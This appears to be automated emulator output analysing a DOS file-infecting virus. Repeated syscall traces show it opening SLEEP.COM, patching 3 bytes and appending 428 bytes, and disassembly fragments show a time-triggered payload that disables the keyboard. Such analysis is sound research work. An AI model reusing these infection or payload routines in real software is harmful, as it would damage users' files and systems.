2018-12-25T12:27:06.29516975Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
0x12a83: mov word ptr cs:[di + 0x10], dx
0x12a87: dec cx
0x12a88: inc dx
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21
0x12a8d: pop dx
0x12a8e: add dx, 3
0x12a91: call 0x12b1d
0x12a94: call 0x12b46
0x12a97: call 0x12ba9
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc]
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]
0x12aa6: mov dx, word ptr cs:[di + 0x10]
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21
0x12aae: mov bx, 0x100
0x12ab1: jmp bx
2018-12-25T12:27:06.297635131Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.301480864Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.311982114Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.313066649Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.320492759Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.326696854Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.328007389Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.331029841Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.332397375Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.346908017Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.356009633Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.358666368Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.365072951Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.371382576Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.373843929Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.376651347Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.378797032Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.383072674Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.391187975Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.395001217Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.414636398Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.421535434Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.423401941Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.427098237Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.428741183Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.437218938Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.445974307Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.449216097Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.455653232Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.462795966Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.464334248Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.467189281Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.46881887Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.471853043Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.479518509Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.482046904Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.488864847Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.495014448Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.496284881Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.500402485Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.501745258Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.504610712Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.512916622Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.515531492Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.521937533Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.529106243Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.530670957Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.534172061Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.536520359Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.544709134Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.554124917Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.557855811Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.564917855Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.571846618Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.574195206Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.577327097Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.578810499Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.58204513Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.589468539Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.591909281Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.598214757Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.605206098Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.606836228Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.609644633Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.612097349Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.619974308Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.627945225Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.63152469Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
0x12b55: jl 0x12b9d
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d
0x12b5c: cli
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10
0x12b73: cmp bh, 0
0x12b76: je 0x12b85
0x12b78: mov ch, 1
0x12b7a: sub bh, 1
2018-12-25T12:27:06.633950238Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.640370501Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.642698125Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.49887092Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.50102188Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.503222552Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
0x12a83: mov word ptr cs:[di + 0x10], dx
0x12a87: dec cx
0x12a88: inc dx
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21
0x12a8d: pop dx
0x12a8e: add dx, 3
0x12a91: call 0x12b1d
0x12a94: call 0x12b46
0x12a97: call 0x12ba9
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc]
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]
0x12aa6: mov dx, word ptr cs:[di + 0x10]
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21
0x12aae: mov bx, 0x100
0x12ab1: jmp bx
2018-12-25T12:27:06.506683934Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.510802925Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.543868223Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.545852665Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.553691881Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.561695379Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.563856274Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.567263583Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.569485924Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.584802806Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.592641918Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.595536744Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.605130415Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.613937256Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.615950022Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.619649209Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.621401175Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.624556648Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.634619293Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.637777508Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.645191589Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.65278168Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.65517719Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.658323867Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.660957444Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.670206621Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.68021165Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.683154823Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.690644271Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.697909921Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.699399841Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.703981228Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.706328035Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.709929025Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.719921588Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.722859392Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.729923735Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.73781592Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.739325428Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.742183195Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.745265111Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.748528211Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.757208427Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.760859297Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.768215202Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.775394128Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.777748809Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.781267446Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.782787934Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.788981472Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.796852375Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.799459487Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.803805875Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.80882877Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.810125776Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.812602962Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.814423219Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.816464517Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.822973312Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.826270236Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.83217565Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.836906205Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.83849227Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.840713773Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.841900445Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.847846726Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.853908641Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.855769467Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
0x12b55: jl 0x12b9d
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d
0x12b5c: cli
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10
0x12b73: cmp bh, 0
0x12b76: je 0x12b85
0x12b78: mov ch, 1
0x12b7a: sub bh, 1
2018-12-25T12:27:06.857593199Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.86214356Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.863145458Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":13,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.497751167Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.500132608Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.50116964Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
0x12a83: mov word ptr cs:[di + 0x10], dx
0x12a87: dec cx
0x12a88: inc dx
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21
0x12a8d: pop dx
0x12a8e: add dx, 3
0x12a91: call 0x12b1d
0x12a94: call 0x12b46
0x12a97: call 0x12ba9
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc]
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]
0x12aa6: mov dx, word ptr cs:[di + 0x10]
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21
0x12aae: mov bx, 0x100
0x12ab1: jmp bx
2018-12-25T12:27:06.50337485Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.508229924Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.519897018Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.52113103Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.527732996Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.538427463Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.539590824Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.541623769Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.543441339Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.555018106Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.577084569Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.581118436Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.588023562Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.594270957Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.595899319Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.598875759Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.600502425Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.60446814Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.612472951Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.615336967Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.622408437Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.626853276Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.628059646Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.629994259Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.631488972Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.637666299Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.644261606Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.646461941Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.651497537Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.656786256Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.65843676Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.660397791Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.661608069Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.667168811Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.679848352Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.682747509Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.689926692Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.694388299Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.695351867Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.697469591Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.699251856Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.701254698Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.708356801Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.711472691Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.71813177Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.725610789Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.727295978Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.730038819Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.73251616Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.741288082Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.751014923Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.765877866Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.771004664Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.778343311Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.780257263Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.78323215Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.785232701Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.788335531Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.796758228Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.799276989Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.805422729Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.811883373Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.8131977Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.815882645Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.817672687Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.82639615Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.834449191Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.836865443Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
0x12b55: jl 0x12b9d
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d
0x12b5c: cli
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10
0x12b73: cmp bh, 0
0x12b76: je 0x12b85
0x12b78: mov ch, 1
0x12b7a: sub bh, 1
2018-12-25T12:27:06.969051123Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.974715527Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.976974145Z 43 PC: 12aae | Set date